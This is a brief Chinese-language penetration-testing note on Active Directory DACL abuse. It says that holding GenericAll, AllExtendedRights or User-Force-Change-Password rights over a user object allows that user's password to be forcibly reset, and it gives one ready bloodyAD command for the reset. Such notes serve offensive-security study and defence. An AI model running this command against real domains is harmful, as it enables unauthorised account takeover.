created: 2025-05-25 23:55 tags: - AD域 - DACL_abuse Type: - Note aliases: - ForceChangePassword updated: 2025-05-25 23:55
当控制目标具有 GenericAll 、 AllExtendedRights 或 User-Force-Change-Password 目标用户的对象时,可能会发生这种滥用行为。 如:
GenericAll
AllExtendedRights
User-Force-Change-Password
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"